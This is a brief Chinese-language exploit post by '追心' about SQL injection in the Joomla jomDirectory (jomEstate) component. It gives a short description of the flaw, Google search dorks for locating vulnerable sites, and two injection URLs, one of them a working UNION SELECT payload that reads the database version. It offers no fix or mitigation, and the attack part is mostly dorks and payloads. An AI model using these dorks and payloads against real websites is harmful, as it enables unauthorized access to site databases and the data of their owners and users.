Joomla jomDirectory SQL注入漏洞

    By：追心

漏洞说明：

    jomDirectory提供了不同类型的视图，你可以完全符合你的网站的概念，使经典的目录树结构，编辑或修改文章网页。许多配置选项可以帮助您设置的网站看看，并不需要了解太多代码，Joomla jomDirectory(jomEstate)由于设计上的缺陷，导致sql注入漏洞。

官方网站：

    http://www.comdev.eu

漏洞类型：

    sql注入、sql盲注、脚本注入、盲注

谷歌关键词：

    1、inurl:com_jomdirectory
    2、inurl:com_jomestate

漏洞测试：

    1、http://www.xxx.net/home/search?type=-11+union+select+1,2,3,4,version(),6,7,8,9,10,11--
    2、http://www.xxx.net/index.php/component/jomestate/search?district=[SQLi]